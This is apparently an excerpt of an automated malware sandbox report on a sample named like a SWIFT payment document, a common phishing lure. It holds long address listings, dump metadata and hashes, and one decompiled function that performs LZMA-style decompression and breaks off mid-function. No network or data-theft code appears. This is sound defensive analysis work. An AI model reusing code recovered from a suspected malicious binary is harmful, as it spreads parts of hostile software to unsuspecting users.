                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x00000000
                                                                                  0x004075cf
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d61
                                                                                  0x00406d64
                                                                                  0x00406dd5
                                                                                  0x00406dd8
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x00000000
                                                                                  0x00406dec
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d87
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9c
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406dac
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00000000
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407020
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x0040702d
                                                                                  0x00407030
                                                                                  0x00407033
                                                                                  0x00407036
                                                                                  0x00407039
                                                                                  0x0040703b
                                                                                  0x00407042
                                                                                  0x00407043
                                                                                  0x00407045
                                                                                  0x00407048
                                                                                  0x0040704b
                                                                                  0x0040704e
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407053
                                                                                  0x00407004
                                                                                  0x00407007
                                                                                  0x0040700a
                                                                                  0x00407014
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070bf
                                                                                  0x004070c1
                                                                                  0x004070c5
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x00407127
                                                                                  0x0040712a
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x00000000
                                                                                  0x00407137
                                                                                  0x00407122
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x0040715d
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00407166
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407170
                                                                                  0x00407175
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df8
                                                                                  0x00406df8
                                                                                  0x00406dfc
                                                                                  0x00407569
                                                                                  0x00000000
                                                                                  0x00407569
                                                                                  0x00406e02
                                                                                  0x00406e05
                                                                                  0x00406e08
                                                                                  0x00406e0c
                                                                                  0x00406e0f
                                                                                  0x00406e15
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e17
                                                                                  0x00406e1a
                                                                                  0x00406e1d
                                                                                  0x00406e1d
                                                                                  0x00406e20
                                                                                  0x00406e23
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e29
                                                                                  0x00406e2f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e35
                                                                                  0x00406e35
                                                                                  0x00406e39
                                                                                  0x00406e3c
                                                                                  0x00406e3f
                                                                                  0x00406e42
                                                                                  0x00406e45
                                                                                  0x00406e46
                                                                                  0x00406e49
                                                                                  0x00406e4b
                                                                                  0x00406e51
                                                                                  0x00406e54
                                                                                  0x00406e57
                                                                                  0x00406e5a
                                                                                  0x00406e5d
                                                                                  0x00406e60
                                                                                  0x00406e63
                                                                                  0x00406e7f
                                                                                  0x00406e82
                                                                                  0x00406e85
                                                                                  0x00406e88
                                                                                  0x00406e8f
                                                                                  0x00406e93
                                                                                  0x00406e95
                                                                                  0x00406e99
                                                                                  0x00406e65
                                                                                  0x00406e65
                                                                                  0x00406e69
                                                                                  0x00406e71
                                                                                  0x00406e76
                                                                                  0x00406e78
                                                                                  0x00406e7a
                                                                                  0x00406e7a
                                                                                  0x00406e9c
                                                                                  0x00406ea3
                                                                                  0x00406ea6
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eac
                                                                                  0x00000000
                                                                                  0x00406eb1
                                                                                  0x00406eb1
                                                                                  0x00406eb5
                                                                                  0x00407575
                                                                                  0x00000000
                                                                                  0x00407575
                                                                                  0x00406ebb
                                                                                  0x00406ebe
                                                                                  0x00406ec1
                                                                                  0x00406ec5
                                                                                  0x00406ec8
                                                                                  0x00406ece
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed0
                                                                                  0x00406ed3
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406ed6
                                                                                  0x00406edc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ede
                                                                                  0x00406ee1
                                                                                  0x00406ee4
                                                                                  0x00406ee7
                                                                                  0x00406eea
                                                                                  0x00406eed
                                                                                  0x00406ef0
                                                                                  0x00406ef3
                                                                                  0x00406ef6
                                                                                  0x00406ef9
                                                                                  0x00406efc
                                                                                  0x00406f14
                                                                                  0x00406f17
                                                                                  0x00406f1a
                                                                                  0x00406f1d
                                                                                  0x00406f1d
                                                                                  0x00406f20
                                                                                  0x00406f24
                                                                                  0x00406f26
                                                                                  0x00406efe
                                                                                  0x00406efe
                                                                                  0x00406f06
                                                                                  0x00406f0b
                                                                                  0x00406f0d
                                                                                  0x00406f0f
                                                                                  0x00406f0f
                                                                                  0x00406f29
                                                                                  0x00406f30
                                                                                  0x00406f33
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00000000
                                                                                  0x00406f35
                                                                                  0x00406f33
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00406f3a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f75
                                                                                  0x00406f75
                                                                                  0x00406f79
                                                                                  0x00407581
                                                                                  0x00000000
                                                                                  0x00407581
                                                                                  0x00406f7f
                                                                                  0x00406f82
                                                                                  0x00406f85
                                                                                  0x00406f89
                                                                                  0x00406f8c
                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00000000
                                                                                  0x00407482
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x004075e5
                                                                                  0x004075eb
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x004075f6
                                                                                  0x004075fd
                                                                                  0x00407601
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000
                                                                                  0x004075fa
                                                                                  0x00407447
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407399

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                  • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                  • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                  • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E004070AB() {
                                                                                  				unsigned short _t532;
                                                                                  				signed int _t533;
                                                                                  				void _t534;
                                                                                  				void* _t535;
                                                                                  				signed int _t536;
                                                                                  				signed int _t565;
                                                                                  				signed int _t568;
                                                                                  				signed int _t589;
                                                                                  				signed int* _t606;
                                                                                  				void* _t613;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					if( *(_t613 - 0x40) != 0) {
                                                                                  						L89:
                                                                                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                  						L69:
                                                                                  						_t606 =  *(_t613 - 0x58);
                                                                                  						 *(_t613 - 0x84) = 0x12;
                                                                                  						L132:
                                                                                  						 *(_t613 - 0x54) = _t606;
                                                                                  						L133:
                                                                                  						_t532 =  *_t606;
                                                                                  						_t589 = _t532 & 0x0000ffff;
                                                                                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                  						if( *(_t613 - 0xc) >= _t565) {
                                                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                  							 *(_t613 - 0x40) = 1;
                                                                                  							_t533 = _t532 - (_t532 >> 5);
                                                                                  							 *_t606 = _t533;
                                                                                  						} else {
                                                                                  							 *(_t613 - 0x10) = _t565;
                                                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                  						}
                                                                                  						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                  							L139:
                                                                                  							_t534 =  *(_t613 - 0x84);
                                                                                  							L140:
                                                                                  							 *(_t613 - 0x88) = _t534;
                                                                                  							goto L1;
                                                                                  						} else {
                                                                                  							L137:
                                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                                  								 *(_t613 - 0x88) = 5;
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                  							goto L139;
                                                                                  						}
                                                                                  					} else {
                                                                                  						if( *(__ebp - 0x60) == 0) {
                                                                                  							L171:
                                                                                  							_t536 = _t535 | 0xffffffff;
                                                                                  							L172:
                                                                                  							return _t536;
                                                                                  						}
                                                                                  						__eax = 0;
                                                                                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  						0 | _t258 = _t258 + _t258 + 9;
                                                                                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                  						L75:
                                                                                  						if( *(__ebp - 0x64) == 0) {
                                                                                  							 *(__ebp - 0x88) = 0x1b;
                                                                                  							L170:
                                                                                  							_t568 = 0x22;
                                                                                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                  							_t536 = 0;
                                                                                  							goto L172;
                                                                                  						}
                                                                                  						__eax =  *(__ebp - 0x14);
                                                                                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  						if(__eax >=  *(__ebp - 0x74)) {
                                                                                  							__eax = __eax +  *(__ebp - 0x74);
                                                                                  						}
                                                                                  						__edx =  *(__ebp - 8);
                                                                                  						__cl =  *(__eax + __edx);
                                                                                  						__eax =  *(__ebp - 0x14);
                                                                                  						 *(__ebp - 0x5c) = __cl;
                                                                                  						 *(__eax + __edx) = __cl;
                                                                                  						__eax = __eax + 1;
                                                                                  						__edx = 0;
                                                                                  						_t274 = __eax %  *(__ebp - 0x74);
                                                                                  						__eax = __eax /  *(__ebp - 0x74);
                                                                                  						__edx = _t274;
                                                                                  						__eax =  *(__ebp - 0x68);
                                                                                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  						_t283 = __ebp - 0x64;
                                                                                  						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                  						 *( *(__ebp - 0x68)) = __cl;
                                                                                  						L79:
                                                                                  						 *(__ebp - 0x14) = __edx;
                                                                                  						L80:
                                                                                  						 *(__ebp - 0x88) = 2;
                                                                                  					}
                                                                                  					L1:
                                                                                  					_t535 =  *(_t613 - 0x88);
                                                                                  					if(_t535 > 0x1c) {
                                                                                  						goto L171;
                                                                                  					}
                                                                                  					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                                  						case 0:
                                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                                  								goto L170;
                                                                                  							}
                                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                  							_t535 =  *( *(_t613 - 0x70));
                                                                                  							if(_t535 > 0xe1) {
                                                                                  								goto L171;
                                                                                  							}
                                                                                  							_t539 = _t535 & 0x000000ff;
                                                                                  							_push(0x2d);
                                                                                  							asm("cdq");
                                                                                  							_pop(_t570);
                                                                                  							_push(9);
                                                                                  							_pop(_t571);
                                                                                  							_t609 = _t539 / _t570;
